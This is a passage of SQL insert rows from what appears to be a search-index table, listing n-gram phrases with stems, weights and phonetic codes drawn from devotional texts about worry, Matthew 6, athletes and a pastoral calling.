(302399, 'reap nor', 'reap nor', 0, 1, 1.2667, 'R156', 1, '*'),
(302400, 'reap nor gather', 'reap nor gather', 0, 1, 1.5, 'R156236', 1, '*'),
(302401, 'refuse', 'refus', 0, 0, 0.4, 'R120', 1, '*'),
(302402, 'refuse to', 'refus to', 0, 1, 1.3, 'R123', 1, '*'),
(302403, 'refuse to be', 'refus to be', 0, 1, 1.4, 'R1231', 1, '*'),
(302404, 'regenerated', 'regener', 0, 0, 0.7333, 'R2563', 1, '*'),
(302405, 'regenerated human', 'regener human', 0, 1, 1.5667, 'R25635', 1, '*'),
(302406, 'regenerated human spirit', 'regener human spirit', 0, 1, 1.8, 'R256352163', 1, '*'),
(302407, 'responsibility open', 'respons open', 0, 1, 1.6333, 'R215214315', 1, '*'),
(302408, 'responsibility open your', 'respons open your', 0, 1, 1.8, 'R2152143156', 1, '*'),
(302409, 'responsible though', 'respons though', 0, 1, 1.6, 'R21521432', 1, '*'),
(302410, 'responsible though worrying', 'respons though worrying', 0, 1, 1.9, 'R21521432652', 1, '*'),
(302411, 'rev mrs areogun', 'rev mrs areogun', 0, 1, 1.5, 'R1562625', 1, '*'),
(302412, 'rise up from', 'rise up from', 0, 1, 1.4, 'R2165', 1, '*'),
(302413, 'robs your', 'rob your', 0, 1, 1.3, 'R126', 1, '*'),
(302414, 'robs your mind', 'rob your mind', 0, 1, 1.4667, 'R12653', 1, '*'),
(302415, 'room to work', 'room to work', 0, 1, 1.4, 'R5362', 1, '*'),
(302416, 's heart 23', 's heart 23', 0, 1, 1.3333, 'S630', 1, '*'),
(302417, 'say to', 'sai to', 0, 1, 1.2, 'S300', 1, '*'),
(302418, 'say to you', 'sai to you', 0, 1, 1.3333, 'S300', 1, '*'),
(302419, 'scripture matthew', 'scriptur matthew', 0, 1, 1.5667, 'S613653', 1, '*'),
(302420, 'scripture matthew 6', 'scriptur matthew 6', 0, 1, 1.6333, 'S613653', 1, '*'),
(302421, 'seems difficult', 'seem difficult', 0, 1, 1.5, 'S5231243', 1, '*'),
(302422, 'seems difficult comes', 'seem difficult comes', 0, 1, 1.7, 'S5231243252', 1, '*'),
(302423, 'sense of responsibility', 'sens of responsibility', 0, 1, 1.7667, 'S52162152143', 1, '*'),
(302424, 'serious matters', 'seriou matters', 0, 1, 1.5, 'S625362', 1, '*'),
(302425, 'serious matters no', 'seriou matters no', 0, 1, 1.6, 'S6253625', 1, '*'),
(302426, 'she does', 'she does', 0, 1, 1.2667, 'S320', 1, '*'),
(302427, 'she does not', 'she does not', 0, 1, 1.4, 'S3253', 1, '*'),
(302428, 'she stays', 'she stays', 0, 1, 1.3, 'S320', 1, '*'),
(302429, 'she stays calm', 'she stays calm', 0, 1, 1.4667, 'S3245', 1, '*'),
(302430, 'showed me', 'show me', 0, 1, 1.3, 'S350', 3, '*'),
(302431, 'showed me this', 'show me this', 0, 1, 1.4667, 'S3532', 1, '*'),
(302432, 'shutting', 'shut', 0, 0, 0.5333, 'S352', 1, '*'),
(302433, 'shutting out', 'shut out', 0, 1, 1.4, 'S3523', 1, '*'),
(302434, 'shutting out that', 'shut out that', 0, 1, 1.5667, 'S3523', 1, '*'),
(302435, 'sickly', 'sickli', 0, 0, 0.4, 'S400', 1, '*'),
(302436, 'sickly in', 'sickli in', 0, 1, 1.3, 'S450', 1, '*'),
(302437, 'sickly in your', 'sickli in your', 0, 1, 1.4667, 'S456', 1, '*'),
(302438, 'situation only', 'situat only', 0, 1, 1.4667, 'S354', 1, '*'),
(302439, 'situation only gets', 'situat only gets', 0, 1, 1.6333, 'S354232', 1, '*'),
(302440, 'so fight', 'so fight', 0, 1, 1.2667, 'S123', 1, '*'),
(302441, 'so fight to', 'so fight to', 0, 1, 1.3667, 'S123', 1, '*'),
(302442, 'so much love', 'so much love', 0, 1, 1.4, 'S5241', 1, '*'),
(302443, 'so worried', 'so worried', 0, 1, 1.3333, 'S630', 1, '*'),
(302444, 'so worried about', 'so worried about', 0, 1, 1.5333, 'S6313', 1, '*'),
(302445, 'solution', 'solut', 0, 0, 0.5333, 'S435', 1, '*'),
(302446, 'solution sometimes', 'solut sometimes', 0, 1, 1.6, 'S43525352', 1, '*'),
(302447, 'solution sometimes instead', 'solut sometimes instead', 0, 1, 1.8667, 'S43525352523', 1, '*'),
(302448, 'solution when', 'solut when', 0, 1, 1.4333, 'S435', 1, '*'),
(302449, 'solution when you', 'solut when you', 0, 1, 1.5667, 'S435', 1, '*'),
(302450, 'solutions', 'solut', 0, 0, 0.6, 'S4352', 1, '*'),
(302451, 'solutions begin', 'solut begin', 0, 1, 1.5, 'S4352125', 1, '*'),
(302452, 'solutions begin to', 'solut begin to', 0, 1, 1.6, 'S43521253', 1, '*'),
(302453, 'solutions to', 'solut to', 0, 1, 1.4, 'S43523', 1, '*'),
(302454, 'solutions to matters', 'solut to matters', 0, 1, 1.6667, 'S435235362', 1, '*'),
(302455, 'solve the', 'solv the', 0, 1, 1.3, 'S413', 1, '*'),
(302456, 'solve the problems', 'solv the problems', 0, 1, 1.6, 'S413161452', 1, '*'),
(302457, 'solved', 'solv', 0, 0, 0.4, 'S413', 2, '*'),
(302458, 'solved any', 'solv any', 0, 1, 1.3333, 'S4135', 1, '*'),
(302459, 'solved any problem', 'solv any problem', 0, 1, 1.6, 'S413516145', 1, '*'),
(302460, 'solving', 'solv', 0, 0, 0.4667, 'S4152', 1, '*'),
(302461, 'solving your', 'solv your', 0, 1, 1.4, 'S41526', 1, '*'),
(302462, 'solving your problems', 'solv your problems', 0, 1, 1.7, 'S41526161452', 1, '*'),
(302463, 'sometimes i', 'sometim i', 0, 1, 1.3667, 'S5352', 1, '*'),
(302464, 'sometimes i call', 'sometim i call', 0, 1, 1.5333, 'S53524', 1, '*'),
(302465, 'sometimes instead', 'sometim instead', 0, 1, 1.5667, 'S5352523', 1, '*'),
(302466, 'sometimes instead of', 'sometim instead of', 0, 1, 1.6667, 'S53525231', 1, '*'),
(302467, 'sow nor', 'sow nor', 0, 1, 1.2333, 'S560', 1, '*'),
(302468, 'sow nor reap', 'sow nor reap', 0, 1, 1.4, 'S561', 1, '*'),
(302469, 'spirit and let', 'spirit and let', 0, 1, 1.4667, 'S1635343', 1, '*'),
(302470, 'spirit can make', 'spirit can make', 0, 1, 1.5, 'S163252', 1, '*'),
(302471, 'spirit it does', 'spirit it does', 0, 1, 1.4667, 'S1632', 1, '*'),
(302472, 'spirit over it', 'spirit over it', 0, 1, 1.4667, 'S163163', 1, '*'),
(302473, 'spirit to solve', 'spirit to solve', 0, 1, 1.5, 'S163241', 1, '*'),
(302474, 'start praying', 'start praying', 0, 1, 1.4333, 'S3631652', 1, '*'),
(302475, 'start praying in', 'start praying in', 0, 1, 1.5333, 'S36316525', 1, '*'),
(302476, 'stature', 'statur', 0, 0, 0.4667, 'S360', 1, '*'),
(302477, 'stature one', 'statur one', 0, 1, 1.3667, 'S365', 1, '*'),
(302478, 'stature one thing', 'statur one thing', 0, 1, 1.5667, 'S365352', 1, '*'),
(302479, 'stays', 'stai', 0, 0, 0.3333, 'S320', 1, '*'),
(302480, 'stays calm', 'stai calm', 0, 1, 1.3333, 'S3245', 1, '*'),
(302481, 'stays calm and', 'stai calm and', 0, 1, 1.4667, 'S32453', 1, '*'),
(302482, 'stop worrying', 'stop worrying', 0, 1, 1.4333, 'S31652', 1, '*'),
(302483, 'stop worrying about', 'stop worrying about', 0, 1, 1.6333, 'S3165213', 1, '*'),
(302484, 'than clothing', 'than clothing', 0, 1, 1.4333, 'T524352', 1, '*'),
(302485, 'than clothing 26', 'than clothing 26', 0, 1, 1.5333, 'T524352', 1, '*'),
(302486, 'than food', 'than food', 0, 1, 1.3, 'T513', 1, '*'),
(302487, 'than food and', 'than food and', 0, 1, 1.4333, 'T51353', 1, '*'),
(302488, 'than they 27', 'than they 27', 0, 1, 1.4, 'T530', 1, '*'),
(302489, 'that is i', 'that is i', 0, 1, 1.3, 'T200', 1, '*'),
(302490, 'that negative', 'that negative', 0, 1, 1.4333, 'T5231', 1, '*'),
(302491, 'that negative emotion', 'that negative emotion', 0, 1, 1.7, 'T5231535', 1, '*'),
(302492, 'that robs', 'that robs', 0, 1, 1.3, 'T612', 1, '*'),
(302493, 'that robs your', 'that robs your', 0, 1, 1.4667, 'T6126', 1, '*'),
(302494, 'that seems', 'that seems', 0, 1, 1.3333, 'T252', 1, '*'),
(302495, 'that seems difficult', 'that seems difficult', 0, 1, 1.6667, 'T25231243', 1, '*'),
(302496, 'that she', 'that she', 0, 1, 1.2667, 'T200', 1, '*'),
(302497, 'that she does', 'that she does', 0, 1, 1.4333, 'T232', 1, '*'),
(302498, 'that the holy', 'that the holy', 0, 1, 1.4333, 'T400', 1, '*'),
(302499, 'that the problem', 'that the problem', 0, 1, 1.5333, 'T16145', 1, '*'),
(302500, 'that you worry', 'that you worry', 0, 1, 1.4667, 'T600', 1, '*'),
(302501, 'that your worrying', 'that your worrying', 0, 1, 1.6, 'T652', 1, '*'),
(302502, 'that your worst', 'that your worst', 0, 1, 1.5, 'T623', 1, '*'),
(302503, 'the air for', 'the air for', 0, 1, 1.3667, 'T616', 1, '*'),
(302504, 'the anointed', 'the anointed', 0, 1, 1.4, 'T530', 1, '*'),
(302505, 'the anointed around', 'the anointed around', 0, 1, 1.6333, 'T53653', 1, '*'),
(302506, 'the birds', 'the birds', 0, 1, 1.3, 'T1632', 1, '*'),
(302507, 'the birds of', 'the birds of', 0, 1, 1.4, 'T16321', 1, '*'),
(302508, 'the body more', 'the body more', 0, 1, 1.4333, 'T1356', 1, '*'),
(302509, 'the creativity', 'the creativity', 0, 1, 1.4667, 'T26313', 1, '*'),
(302510, 'the creativity embedded', 'the creativity embedded', 0, 1, 1.7667, 'T26313513', 1, '*'),
(302511, 'the fact', 'the fact', 0, 1, 1.2667, 'T123', 1, '*'),
(302512, 'the fact that', 'the fact that', 0, 1, 1.4333, 'T123', 1, '*'),
(302513, 'the matter', 'the matter', 0, 1, 1.3333, 'T536', 1, '*'),
(302514, 'the matter and', 'the matter and', 0, 1, 1.4667, 'T53653', 1, '*'),
(302515, 'the matter give', 'the matter give', 0, 1, 1.5, 'T53621', 1, '*'),
(302516, 'the matter whenever', 'the matter whenever', 0, 1, 1.6333, 'T536516', 1, '*'),
(302517, 'the matter with', 'the matter with', 0, 1, 1.5, 'T5363', 1, '*'),
(302518, 'the problem is', 'the problem is', 0, 1, 1.4667, 'T161452', 2, '*'),
(302519, 'the problems and', 'the problems and', 0, 1, 1.5333, 'T16145253', 1, '*'),
(302520, 'the problems i', 'the problems i', 0, 1, 1.4667, 'T161452', 1, '*'),
(302521, 'the spirit over', 'the spirit over', 0, 1, 1.5, 'T216316', 1, '*'),
(302522, 'the working', 'the working', 0, 1, 1.3667, 'T6252', 1, '*'),
(302523, 'the working of', 'the working of', 0, 1, 1.4667, 'T62521', 1, '*'),
(302524, 'the zone', 'the zone', 0, 1, 1.2667, 'T250', 1, '*'),
(302525, 'the zone of', 'the zone of', 0, 1, 1.3667, 'T251', 1, '*'),
(302526, 'them are', 'them are', 0, 1, 1.2667, 'T560', 1, '*'),
(302527, 'them are you', 'them are you', 0, 1, 1.4, 'T560', 1, '*'),
(302528, 'they 27', 'thei 27', 0, 1, 1.2333, 'T000', 1, '*'),
(302529, 'they 27 which', 'thei 27 which', 0, 1, 1.4333, 'T200', 1, '*'),
(302530, 'they neither', 'thei neither', 0, 1, 1.4, 'T536', 1, '*'),
(302531, 'they neither sow', 'thei neither sow', 0, 1, 1.5333, 'T5362', 1, '*'),
(302532, 'thing i', 'thing i', 0, 1, 1.2333, 'T520', 1, '*'),
(302533, 'thing i so', 'thing i so', 0, 1, 1.3333, 'T520', 1, '*'),
(302534, 'this scripture', 'thi scripture', 0, 1, 1.4667, 'T26136', 1, '*'),
(302535, 'this scripture matthew', 'thi scripture matthew', 0, 1, 1.7333, 'T2613653', 1, '*'),
(302536, 'though worrying', 'though worrying', 0, 1, 1.5, 'T2652', 1, '*'),
(302537, 'though worrying gives', 'though worrying gives', 0, 1, 1.7, 'T265212', 1, '*'),
(302538, 'to be solved', 'to be solved', 0, 1, 1.4, 'T12413', 1, '*'),
(302539, 'to be worried', 'to be worried', 0, 1, 1.4333, 'T163', 1, '*'),
(302540, 'to bring a', 'to bring a', 0, 1, 1.3333, 'T1652', 1, '*'),
(302541, 'to escape before', 'to escape before', 0, 1, 1.5333, 'T216', 1, '*'),
(302542, 'to flow', 'to flow', 0, 1, 1.2333, 'T140', 2, '*'),
(302543, 'to flow if', 'to flow if', 0, 1, 1.3333, 'T141', 1, '*'),
(302544, 'to god by', 'to god by', 0, 1, 1.3, 'T231', 1, '*'),
(302545, 'to his stature', 'to his stature', 0, 1, 1.4667, 'T236', 1, '*'),
(302546, 'to matters', 'to matters', 0, 1, 1.3333, 'T5362', 1, '*'),
(302547, 'to matters worry', 'to matters worry', 0, 1, 1.5333, 'T53626', 1, '*'),
(302548, 'to solve the', 'to solve the', 0, 1, 1.4, 'T2413', 1, '*'),
(302549, 'to trap', 'to trap', 0, 1, 1.2333, 'T610', 1, '*'),
(302550, 'to trap you', 'to trap you', 0, 1, 1.3667, 'T610', 1, '*'),
(302551, 'to work on', 'to work on', 0, 1, 1.3333, 'T625', 1, '*'),
(302552, 'to worry', 'to worry', 0, 1, 1.2667, 'T600', 1, '*'),
(302553, 'to worry a', 'to worry a', 0, 1, 1.3333, 'T600', 1, '*'),
(302554, 'to you do', 'to you do', 0, 1, 1.3, 'T000', 1, '*'),
(302555, 'too late have', 'too late have', 0, 1, 1.4333, 'T431', 1, '*'),
(302556, 'too many', 'too many', 0, 1, 1.2667, 'T500', 1, '*'),
(302557, 'too many issues', 'too many issues', 0, 1, 1.5, 'T520', 1, '*'),
(302558, 'trap', 'trap', 0, 0, 0.2667, 'T610', 1, '*'),
(302559, 'trap that', 'trap that', 0, 1, 1.3, 'T613', 1, '*'),
(302560, 'trap that you', 'trap that you', 0, 1, 1.4333, 'T613', 1, '*'),
(302561, 'trap you', 'trap you', 0, 1, 1.2667, 'T610', 1, '*'),
(302562, 'trap you into', 'trap you into', 0, 1, 1.4333, 'T6153', 1, '*'),
(302563, 'turn it', 'turn it', 0, 1, 1.2333, 'T653', 1, '*'),
(302564, 'turn it over', 'turn it over', 0, 1, 1.4, 'T65316', 1, '*'),
(302565, 'until god', 'until god', 0, 1, 1.3, 'U53423', 1, '*'),
(302566, 'until god showed', 'until god showed', 0, 1, 1.5333, 'U5342323', 1, '*'),
(302567, 'up from', 'up from', 0, 1, 1.2333, 'U165', 1, '*'),
(302568, 'up from within', 'up from within', 0, 1, 1.4667, 'U16535', 1, '*'),
(302569, 'up i refuse', 'up i refuse', 0, 1, 1.3667, 'U1612', 1, '*'),
(302570, 'used to be', 'us to be', 0, 1, 1.3333, 'U231', 1, '*'),
(302571, 'used to worry', 'us to worry', 0, 1, 1.4333, 'U236', 1, '*'),
(302572, 'value than', 'valu than', 0, 1, 1.3333, 'V435', 1, '*'),
(302573, 'value than they', 'valu than they', 0, 1, 1.5, 'V4353', 1, '*'),
(302574, 'way of solving', 'wai of solving', 0, 1, 1.4667, 'W124152', 1, '*'),
(302575, 'we discuss', 'we discuss', 0, 1, 1.3333, 'W320', 1, '*'),
(302576, 'we discuss the', 'we discuss the', 0, 1, 1.4667, 'W323', 1, '*'),
(302577, 'what you will', 'what you will', 0, 1, 1.4333, 'W340', 1, '*'),
(302578, 'when you turn', 'when you turn', 0, 1, 1.4333, 'W5365', 1, '*'),
(302579, 'when you worry', 'when you worry', 0, 1, 1.4667, 'W560', 1, '*'),
(302580, 'whenever a', 'whenev a', 0, 1, 1.3333, 'W516', 1, '*'),
(302581, 'whenever a matter', 'whenev a matter', 0, 1, 1.5667, 'W516536', 1, '*'),
(302582, 'whenever you worry', 'whenev you worry', 0, 1, 1.6, 'W516', 1, '*'),
(302583, 'which of', 'which of', 0, 1, 1.2667, 'W210', 2, '*'),
(302584, 'which of you', 'which of you', 0, 1, 1.4, 'W210', 1, '*'),
(302585, 'why don\'t', 'why don', 0, 1, 1.3, 'W353', 2, '*'),
(302586, 'why don\'t you', 'why don you', 0, 1, 1.4333, 'W353', 2, '*'),
(302587, 'wife rev', 'wife rev', 0, 1, 1.2667, 'W161', 1, '*'),
(302588, 'wife rev mrs', 'wife rev mrs', 0, 1, 1.4, 'W161562', 1, '*'),
(302589, 'wife we', 'wife we', 0, 1, 1.2333, 'W100', 1, '*'),
(302590, 'wife we discuss', 'wife we discuss', 0, 1, 1.5, 'W132', 1, '*'),
(302591, 'will drink', 'will drink', 0, 1, 1.3333, 'W43652', 1, '*'),
(302592, 'will drink nor', 'will drink nor', 0, 1, 1.4667, 'W4365256', 1, '*'),
(302593, 'will eat or', 'will eat or', 0, 1, 1.3667, 'W436', 1, '*'),
(302594, 'will put', 'will put', 0, 1, 1.2667, 'W413', 1, '*'),
(302595, 'will put on', 'will put on', 0, 1, 1.3667, 'W4135', 1, '*'),
(302596, 'with the anointed', 'with the anointed', 0, 1, 1.5667, 'W353', 1, '*'),
(302597, 'within my', 'within my', 0, 1, 1.3, 'W350', 1, '*'),
(302598, 'within my spirit', 'within my spirit', 0, 1, 1.5333, 'W352163', 1, '*'),
(302599, 'work on it', 'work on it', 0, 1, 1.3333, 'W6253', 1, '*'),
(302600, 'working of', 'work of', 0, 1, 1.3333, 'W62521', 1, '*'),
(302601, 'working of the', 'work of the', 0, 1, 1.4667, 'W625213', 1, '*'),
(302602, 'worried', 'worri', 0, 0, 0.4667, 'W630', 1, '*'),
(302603, 'worried about', 'worri about', 0, 1, 1.4333, 'W6313', 1, '*'),
(302604, 'worried about have', 'worri about have', 0, 1, 1.6, 'W63131', 1, '*'),
(302605, 'worried i', 'worri i', 0, 1, 1.3, 'W630', 1, '*'),
(302606, 'worried i pray', 'worri i pray', 0, 1, 1.4667, 'W6316', 1, '*'),
(302607, 'worrier', 'worrier', 0, 0, 0.4667, 'W600', 1, '*'),
(302608, 'worrier that', 'worrier that', 0, 1, 1.4, 'W630', 1, '*'),
(302609, 'worrier that is', 'worrier that is', 0, 1, 1.5, 'W632', 1, '*'),
(302610, 'worry a', 'worri a', 0, 1, 1.2333, 'W600', 1, '*'),
(302611, 'worry a lot', 'worri a lot', 0, 1, 1.3667, 'W643', 1, '*'),
(302612, 'worry about', 'worri about', 0, 1, 1.3667, 'W613', 1, '*'),
(302613, 'worry about a', 'worri about a', 0, 1, 1.4333, 'W613', 1, '*'),
(302614, 'worry about anything', 'worri about anything', 0, 1, 1.6667, 'W6135352', 1, '*'),
(302615, 'worry about your', 'worri about your', 0, 1, 1.5333, 'W6136', 1, '*'),
(302616, 'worry and worrying', 'worri and worrying', 0, 1, 1.6, 'W653652', 1, '*'),
(302617, 'worry and you', 'worri and you', 0, 1, 1.4333, 'W653', 1, '*'),
(302618, 'worry beloved', 'worri beloved', 0, 1, 1.4333, 'W61413', 1, '*'),
(302619, 'worry beloved no', 'worri beloved no', 0, 1, 1.5333, 'W614135', 1, '*'),
(302620, 'worry doesn\'t', 'worri doesn', 0, 1, 1.4333, 'W63253', 1, '*'),
(302621, 'worry doesn\'t mean', 'worri doesn mean', 0, 1, 1.6, 'W632535', 1, '*'),
(302622, 'worry fade', 'worri fade', 0, 1, 1.3333, 'W613', 1, '*'),
(302623, 'worry fade out', 'worri fade out', 0, 1, 1.4667, 'W613', 1, '*'),
(302624, 'worry is', 'worri is', 0, 1, 1.2667, 'W620', 1, '*'),
(302625, 'worry is a', 'worri is a', 0, 1, 1.3333, 'W620', 1, '*'),
(302626, 'worry magnifies', 'worri magnifies', 0, 1, 1.5, 'W652512', 1, '*'),
(302627, 'worry magnifies the', 'worri magnifies the', 0, 1, 1.6333, 'W6525123', 1, '*'),
(302628, 'worrying', 'worri', 0, 0, 0.5333, 'W652', 1, '*'),
(302629, 'worrying about', 'worri about', 0, 1, 1.4667, 'W65213', 1, '*'),
(302630, 'worrying about too', 'worri about too', 0, 1, 1.6, 'W65213', 1, '*'),
(302631, 'worrying can', 'worri can', 0, 1, 1.4, 'W6525', 1, '*'),
(302632, 'worrying can add', 'worri can add', 0, 1, 1.5333, 'W65253', 1, '*'),
(302633, 'worrying doesn\'t', 'worri doesn', 0, 1, 1.5333, 'W6523253', 1, '*'),
(302634, 'worrying doesn\'t mean', 'worri doesn mean', 0, 1, 1.7, 'W65232535', 1, '*'),
(302635, 'worrying gives', 'worri gives', 0, 1, 1.4667, 'W65212', 1, '*'),
(302636, 'worrying gives a', 'worri gives a', 0, 1, 1.5333, 'W65212', 1, '*'),
(302637, 'worrying has', 'worri has', 0, 1, 1.4, 'W652', 1, '*'),
(302638, 'worrying has never', 'worri has never', 0, 1, 1.6, 'W652516', 1, '*'),
(302639, 'worrying is', 'worri is', 0, 1, 1.3667, 'W652', 1, '*'),
(302640, 'worrying is not', 'worri is not', 0, 1, 1.5, 'W65253', 1, '*'),
(302641, 'worrying it', 'worri it', 0, 1, 1.3667, 'W6523', 1, '*'),
(302642, 'worrying it is', 'worri it is', 0, 1, 1.4667, 'W65232', 1, '*'),
(302643, 'worrying over', 'worri over', 0, 1, 1.4333, 'W65216', 1, '*'),
(302644, 'worrying over a', 'worri over a', 0, 1, 1.5, 'W65216', 1, '*'),
(302645, 'worrying stop', 'worri stop', 0, 1, 1.4333, 'W65231', 1, '*'),
(302646, 'worrying stop worrying', 'worri stop worrying', 0, 1, 1.7333, 'W65231652', 1, '*'),
(302647, 'worrying why', 'worri why', 0, 1, 1.4, 'W652', 1, '*'),
(302648, 'worrying why don\'t', 'worri why don', 0, 1, 1.6, 'W652353', 1, '*'),
(302649, 'worse', 'wors', 0, 0, 0.3333, 'W620', 1, '*'),
(302650, 'worse when', 'wors when', 0, 1, 1.3333, 'W625', 1, '*'),
(302651, 'worse when you', 'wors when you', 0, 1, 1.4667, 'W625', 1, '*'),
(302652, 'worst fears', 'worst fears', 0, 1, 1.3667, 'W623162', 1, '*'),
(302653, 'worst fears have', 'worst fears have', 0, 1, 1.5333, 'W6231621', 1, '*'),
(302654, 'yet your', 'yet your', 0, 1, 1.2667, 'Y360', 1, '*'),
(302655, 'yet your heavenly', 'yet your heavenly', 0, 1, 1.5667, 'Y36154', 1, '*'),
(302656, 'you are activating', 'you are activating', 0, 1, 1.6, 'Y6231352', 1, '*'),
(302657, 'you are responsible', 'you are responsible', 0, 1, 1.6333, 'Y6215214', 1, '*'),
(302658, 'you are shutting', 'you are shutting', 0, 1, 1.5333, 'Y62352', 1, '*'),
(302659, 'you become', 'you become', 0, 1, 1.3333, 'Y125', 2, '*'),
(302660, 'you become irresponsible', 'you become irresponsible', 0, 1, 1.8, 'Y1256215214', 1, '*'),
(302661, 'you by worrying', 'you by worrying', 0, 1, 1.5, 'Y1652', 1, '*'),
(302662, 'you creative', 'you creative', 0, 1, 1.4, 'Y2631', 1, '*'),
(302663, 'you creative your', 'you creative your', 0, 1, 1.5667, 'Y26316', 1, '*'),
(302664, 'you get a', 'you get a', 0, 1, 1.3, 'Y230', 1, '*'),
(302665, 'you have been', 'you have been', 0, 1, 1.4333, 'Y150', 3, '*'),
(302666, 'you into a', 'you into a', 0, 1, 1.3333, 'Y530', 2, '*'),
(302667, 'you let god', 'you let god', 0, 1, 1.3667, 'Y4323', 1, '*'),
(302668, 'you lose', 'you lose', 0, 1, 1.2667, 'Y420', 1, '*'),
(302669, 'you lose the', 'you lose the', 0, 1, 1.4, 'Y423', 1, '*'),
(302670, 'you more', 'you more', 0, 1, 1.2667, 'Y560', 1, '*'),
(302671, 'you more faithless', 'you more faithless', 0, 1, 1.6, 'Y561342', 1, '*'),
(302672, 'you not discovered', 'you not discovered', 0, 1, 1.6, 'Y532163', 1, '*'),
(302673, 'you not found', 'you not found', 0, 1, 1.4333, 'Y53153', 1, '*'),
(302674, 'you not of', 'you not of', 0, 1, 1.3333, 'Y531', 1, '*'),
(302675, 'you or start', 'you or start', 0, 1, 1.4, 'Y62363', 1, '*'),
(302676, 'you out of', 'you out of', 0, 1, 1.3333, 'Y310', 2, '*'),
(302677, 'you to bring', 'you to bring', 0, 1, 1.4, 'Y31652', 1, '*'),
(302678, 'you turn', 'you turn', 0, 1, 1.2667, 'Y365', 1, '*'),
(302679, 'you turn it', 'you turn it', 0, 1, 1.3667, 'Y3653', 1, '*'),
(302680, 'you will drink', 'you will drink', 0, 1, 1.4667, 'Y43652', 1, '*'),
(302681, 'you will eat', 'you will eat', 0, 1, 1.4, 'Y430', 1, '*'),
(302682, 'you will put', 'you will put', 0, 1, 1.4, 'Y413', 1, '*'),
(302683, 'you worry', 'you worry', 0, 1, 1.3, 'Y600', 1, '*'),
(302684, 'you worry about', 'you worry about', 0, 1, 1.5, 'Y613', 1, '*'),
(302685, 'you worry and', 'you worry and', 0, 1, 1.4333, 'Y653', 1, '*'),
(302686, 'you worry doesn\'t', 'you worry doesn', 0, 1, 1.5667, 'Y63253', 1, '*'),
(302687, 'your body beloved', 'your body beloved', 0, 1, 1.5667, 'Y6131413', 1, '*'),
(302688, 'your body what', 'your body what', 0, 1, 1.4667, 'Y613', 1, '*'),
(302689, 'your heavenly', 'your heavenly', 0, 1, 1.4333, 'Y6154', 1, '*'),
(302690, 'your heavenly father', 'your heavenly father', 0, 1, 1.6667, 'Y6154136', 1, '*'),
(302691, 'your mind of', 'your mind of', 0, 1, 1.4, 'Y6531', 1, '*'),
(302692, 'your problems', 'your problems', 0, 1, 1.4333, 'Y6161452', 1, '*'),
(302693, 'your problems or', 'your problems or', 0, 1, 1.5333, 'Y61614526', 1, '*'),
(302694, 'your regenerated', 'your regenerated', 0, 1, 1.5333, 'Y62563', 1, '*'),
(302695, 'your regenerated human', 'your regenerated human', 0, 1, 1.7333, 'Y625635', 1, '*'),
(302696, 'your situation', 'your situation', 0, 1, 1.4667, 'Y6235', 1, '*'),
(302697, 'your situation only', 'your situation only', 0, 1, 1.6333, 'Y62354', 1, '*'),
(302698, 'your worrying', 'your worrying', 0, 1, 1.4333, 'Y652', 1, '*'),
(302699, 'your worrying has', 'your worrying has', 0, 1, 1.5667, 'Y652', 1, '*'),
(302700, 'your worst', 'your worst', 0, 1, 1.3333, 'Y623', 1, '*'),
(302701, 'your worst fears', 'your worst fears', 0, 1, 1.5333, 'Y623162', 1, '*'),
(302702, 'yourself worrying', 'yourself worrying', 0, 1, 1.5667, 'Y6241652', 1, '*'),
(302703, 'yourself worrying over', 'yourself worrying over', 0, 1, 1.7333, 'Y624165216', 1, '*'),
(302704, 'zone of', 'zone of', 0, 1, 1.2333, 'Z510', 1, '*'),
(302705, 'zone of creativity', 'zone of creativity', 0, 1, 1.6, 'Z5126313', 1, '*'),
(302706, '“therefore i', '“therefor i', 0, 1, 1.4, '“3616', 1, '*'),
(302707, '“therefore i say', '“therefor i say', 0, 1, 1.5333, '“36162', 1, '*'),
(302904, '1 9', '1 9', 0, 1, 1.1, '', 1, '*'),
(302905, '1 9 9', '1 9 9', 0, 1, 1.1667, '', 1, '*'),
(302906, '1500', '1500', 0, 0, 0.4, '', 1, '*'),
(302907, '1500 metres', '1500 metres', 0, 1, 1.3667, 'M362', 1, '*'),
(302908, '1500 metres race', '1500 metres race', 0, 1, 1.5333, 'M36262', 1, '*'),
(302909, '2 timothy 1', '2 timothy 1', 0, 1, 1.3667, 'T530', 1, '*'),
(302910, '30 04', '30 04', 0, 1, 1.1667, '', 1, '*'),
(302911, '30 04 2017', '30 04 2017', 0, 1, 1.3333, '', 1, '*'),
(302912, '45', '45', 0, 0, 0.2, '', 2, '*'),
(302913, '45 from', '45 from', 0, 1, 1.2333, 'F650', 1, '*'),
(302914, '45 from our', '45 from our', 0, 1, 1.3667, 'F656', 1, '*'),
(302915, '9 9 who', '9 9 who', 0, 1, 1.2333, 'W000', 1, '*'),
(302916, '9 who has', '9 who has', 0, 1, 1.3, 'W200', 1, '*'),
(302917, 'a call', 'a call', 0, 1, 1.2, 'A240', 1, '*'),
(302918, 'a call upon', 'a call upon', 0, 1, 1.3667, 'A2415', 1, '*'),
(302919, 'a football', 'a football', 0, 1, 1.3333, 'A1314', 1, '*'),
(302920, 'a football star', 'a football star', 0, 1, 1.5, 'A1314236', 1, '*'),
(302921, 'a good athlete', 'a good athlete', 0, 1, 1.4667, 'A2343', 1, '*'),
(302922, 'a good footballer', 'a good footballer', 0, 1, 1.5667, 'A2313146', 1, '*'),
(302923, 'a holy calling', 'a holy calling', 0, 1, 1.4667, 'A42452', 1, '*'),
(302924, 'a pastor and', 'a pastor and', 0, 1, 1.4, 'A123653', 1, '*'),
(302925, 'a preacher', 'a preacher', 0, 1, 1.3333, 'A1626', 1, '*'),
(302926, 'a preacher of', 'a preacher of', 0, 1, 1.4333, 'A16261', 1, '*'),
(302927, 'a waste', 'a waste', 0, 1, 1.2333, 'A230', 1, '*'),
(302928, 'a waste now', 'a waste now', 0, 1, 1.3667, 'A235', 1, '*'),
(302929, 'a waste the', 'a waste the', 0, 1, 1.3667, 'A230', 1, '*'),
(302930, 'above are', 'abov are', 0, 1, 1.3, 'A160', 1, '*'),
(302931, 'above are those', 'abov are those', 0, 1, 1.5, 'A1632', 1, '*'),
(302932, 'according to his', 'accord to his', 0, 1, 1.5333, 'A2635232', 1, '*'),
(302933, 'according to our', 'accord to our', 0, 1, 1.5333, 'A2635236', 1, '*'),
(302934, 'activities duties', 'activ duties', 0, 1, 1.5667, 'A2313232', 1, '*'),
(302935, 'activities duties responsibilities', 'activ duties responsibilities', 0, 1, 2, 'A2313232621521432', 1, '*'),
(302936, 'actually to', 'actual to', 0, 1, 1.3667, 'A2343', 1, '*'),
(302937, 'actually to have', 'actual to have', 0, 1, 1.5333, 'A23431', 1, '*'),
